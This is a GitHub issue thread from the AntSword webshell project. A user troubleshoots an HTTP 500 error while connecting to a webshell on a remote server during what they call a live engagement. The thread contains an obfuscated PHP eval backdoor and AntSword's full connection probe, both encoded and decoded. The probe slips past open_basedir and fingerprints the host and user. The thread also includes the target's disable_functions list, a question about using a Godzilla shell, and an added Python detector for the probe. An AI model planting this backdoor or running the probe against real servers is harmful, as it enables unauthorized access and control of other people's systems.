AntSwordProject / antSword

AntSword (中国蚁剑) is a cross-platform, open-source website management toolkit.
https://www.yuque.com/antswordproject/antsword
MIT License

Cannot connect to the shell, HTTP 500, but POSTing to the shell from a browser connects normally #306

Closed Weltolk closed 2 years ago

Weltolk commented 2 years ago

Bug report


Detailed bug description

shell.php:

<?php eval(base64_decode(base64_encode(base64_decode('DQpldmFsKCRfUE9TVFsnYSddKTs=')))); ?>

Connects normally on my local machine: [image]

The shell on the target machine (identical to the local shell): [image]

POSTing to the shell on the target machine from a browser connects normally: [image]

When AntSword connects it warns that the SSL certificate has expired; after ticking "Ignore HTTPS certificate" and connecting again, it reports that the connection failed with HTTP 500:



Shell connection bug

  1. Server operating system

    Windows NT xxxxxxxxxx 10.0 build 17763 (Windows Server 2016) AMD64
  2. Server-side shell code

<?php eval(base64_decode(base64_encode(base64_decode('DQpldmFsKCRfUE9TVFsnYSddKTs=')))); ?>
  3. Server environment configuration

php.ini cannot be read across directories, and this is a live engagement, so only part of the phpinfo() output is provided:

PHP Version 7.4.26

Setting | Value
-- | --
System | Windows NT xxxxxxxxxx 10.0 build 17763 (Windows Server 2016) AMD64
Build Date | Nov 16 2021 18:08:06
Compiler | Visual C++ 2017
Architecture | x64
Configure Command | cscript /nologo /e:jscript configure.js "--enable-snapshot-build" "--enable-debug-pack" "--disable-zts" "--with-pdo-oci=c:\php-snap-build\deps_aux\oracle\x64\instantclient_12_1\sdk,shared" "--with-oci8-12c=c:\php-snap-build\deps_aux\oracle\x64\instantclient_12_1\sdk,shared" "--enable-object-out-dir=../obj/" "--enable-com-dotnet=shared" "--without-analyzer" "--with-pgo"
Server API | CGI/FastCGI
Virtual Directory Support | disabled
Configuration File (php.ini) Path | no value
Loaded Configuration File | C:\BtSoft\php\74\php.ini
Scan this dir for additional .ini files | (none)
Additional .ini files parsed | (none)
PHP API | 20190902
PHP Extension | 20190902
Zend Extension | 320190902
Zend Extension Build | API320190902,NTS,VC15
PHP Extension Build | API20190902,NTS,VC15
Debug Build | no
Thread Safety | disabled
Zend Signal Handling | disabled
Zend Memory Manager | enabled
Zend Multibyte Support | provided by mbstring
IPv6 Support | enabled
DTrace Support | disabled
Registered PHP Streams | php, file, glob, data, http, ftp, zip, compress.zlib, compress.bzip2, https, ftps, phar
Registered Stream Socket Transports | tcp, udp, ssl, tls, tlsv1.0, tlsv1.1, tlsv1.2, tlsv1.3
Registered Stream Filters | convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk, zlib.*, bzip2.*, mcrypt.*, mdecrypt.*
  4. Client connection configuration
{"category":"test","url":"https://xxxx.com/a.php","pwd":"a","note":"","type":"php","ip":"000.000.000.000",
"addr":"US AWS","encode":"UTF8","encoder":"default","decoder":"default","httpConf":{"body":{},"headers":{}},
"otherConf":{"add-MassData":0,"chunk-step-byte-max":"3","chunk-step-byte-min":"2","command-path":"",
"custom-datatag-tage":"","custom-datatag-tags":"","filemanager-cache":1,"ignore-https":1,"random-Prefix":"2",
"request-timeout":"10000","terminal-cache":0,"upload-fragment":"500","use-chunk":0,"use-custom-datatag":0,
"use-multipart":0,"use-random-variable":0},"ctime":1653696365555,"utime":1653696365555,"_id":"lhLODXXYLNoe5555"}

Another question: how do I add a Godzilla-generated shell to AntSword? Godzilla-generated shells have a key variable, and I don't know where to put it when adding the shell in AntSword. If it can be added, I wouldn't need the webshell from the bug described above.

Godzilla-generated shell: [image]

Adding the webshell in AntSword: [image]

Medicean commented 2 years ago

You can hook up a Burp Suite proxy and look at the specific cause of the 500. From your description, I suspect disable_functions is blocking some function.

Weltolk commented 2 years ago

> You can hook up a Burp Suite proxy and look at the specific cause of the 500. From your description, I suspect disable_functions is blocking some function.

The response in Burp Suite is just a 500, with no specific error message... [image]

POST /config/admin.php HTTP/1.1
Host: xxxx.cn:443
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)
Content-Type: application/x-www-form-urlencoded
Content-Length: 818
Connection: close

a=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(%22%2F%3B%7C%3A%2F%22%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.10925d914c%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%220286%22.%2292b81%22%3Becho%20%40asenc(%24output)%3Becho%20%2256232%22.%2281f12%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

After URL decoding (the body is what AntSword's default encoder sends as its connection probe):

@ini_set("display_errors", "0");
@set_time_limit(0);
// If open_basedir is set, the probe first tries to relax it before doing anything else.
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split("/;|:/", $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        };
        $tmdir = $item . "/.10925d914c";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        };
        @ini_set("open_basedir", "/");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out)
{
    return $out;
}
// Output is wrapped between two per-request marker strings so the client can find it in the response body.
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "0286" . "92b81";
    echo @asenc($output);
    echo "56232" . "81f12";
}
ob_start();
try {
    // Collect the script directory, available drive letters, OS string and current user, tab-separated.
    $D = dirname($_SERVER["SCRIPT_FILENAME"]);
    if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
    $R = "{$D}\t";
    if (substr($D, 0, 1) != "/") {
        foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
    } else {
        $R .= "/";
    }
    $R .= "\t";
    $u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
    $s = ($u) ? $u["name"] : @get_current_user();
    $R .= php_uname();
    $R .= "\t{$s}";
    echo $R;;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

This is the disable_functions entry from phpinfo():

disable_functions (local value and master value are identical):

passthru,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,
ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,exec

I tried modifying the packet AntSword sends on connect, but found that deleting the same statement from the packet sometimes returns 200 and sometimes 500.
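As an added example (not part of this thread and not AntSword's own code), here is a small Python detector a defender could run over captured POST bodies: it URL-decodes the form body and flags the markers visible in the decoded probe above (display_errors switched off, open_basedir tampering, the asoutput wrapper and the trailing die()). The sample request records are constructed for the example, the marker names are the example's own labels, and the shortened probe source is a stand-in for the full body posted above.

```python
import re
from urllib.parse import parse_qs, urlencode

# Signatures drawn from the decoded probe body posted in this thread.
# The names are this example's own labels, not anything AntSword defines.
MARKERS = {
    "display_errors_off": re.compile(r'@?ini_set\(\s*"display_errors"\s*,\s*"0"\s*\)'),
    "open_basedir_tamper": re.compile(r'@?ini_set\(\s*"open_basedir"'),
    "asoutput_wrapper": re.compile(r'function\s+asoutput\s*\(\s*\)'),
    "asoutput_die_tail": re.compile(r'asoutput\(\)\s*;\s*die\(\)\s*;'),
}
ALERT_THRESHOLD = 2  # require two independent markers before a body is flagged


def decode_form_body(raw_body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into {param: value}."""
    return {k: v[0] for k, v in parse_qs(raw_body, keep_blank_values=True).items()}


def find_markers(raw_body: str) -> list:
    """Return the sorted names of all markers found in any decoded parameter value."""
    hits = set()
    for value in decode_form_body(raw_body).values():
        for name, pattern in MARKERS.items():
            if pattern.search(value):
                hits.add(name)
    return sorted(hits)


def classify_body(raw_body: str) -> tuple:
    """(is_suspicious, marker_names) for one request body."""
    hits = find_markers(raw_body)
    return len(hits) >= ALERT_THRESHOLD, hits


def scan_requests(records: list) -> list:
    """records: list of (method, path, raw_body). Returns one alert dict per flagged body."""
    alerts = []
    for method, path, body in records:
        if method != "POST":
            continue
        suspicious, hits = classify_body(body)
        if suspicious:
            alerts.append({"path": path, "markers": hits})
    return alerts


# --- Constructed sample input: a shortened stand-in for the probe shown in the thread ---
_PROBE_SRC = (
    '@ini_set("display_errors", "0");@set_time_limit(0);'
    '$opdir=@ini_get("open_basedir");if($opdir){@ini_set("open_basedir", "..");}'
    'function asoutput(){$output=ob_get_contents();ob_end_clean();echo "0286"."92b81";'
    'echo $output;echo "56232"."81f12";}ob_start();echo php_uname();asoutput();die();'
)
SAMPLE_PROBE_BODY = urlencode({"a": _PROBE_SRC})
SAMPLE_LOGIN_BODY = urlencode({"user": "alice", "pw": "not-a-real-password", "remember": "1"})
SAMPLE_RECORDS = [
    ("GET", "/index.php", ""),
    ("POST", "/login.php", SAMPLE_LOGIN_BODY),
    ("POST", "/config/admin.php", SAMPLE_PROBE_BODY),
]

if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_RECORDS):
        print(f"ALERT {alert['path']}: {', '.join(alert['markers'])}")
```

The threshold of two markers keeps a single `ini_set("display_errors", "0")` in a legitimate admin script from raising an alert on its own; the wrapper-plus-die combination is what makes the body look like a connection probe rather than ordinary application code.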

Medicean commented 2 years ago

@Weltolk Try changing the payload to turn display_errors on and look at the specific error, or paste the full phpinfo output.

Weltolk commented 2 years ago

> @Weltolk Try changing the payload to turn display_errors on and look at the specific error, or paste the full phpinfo output.

The target site has been taken down and its operator is gone = =

DVKunion commented 2 years ago

@Weltolk Try not using the default encoder; that may solve the problem.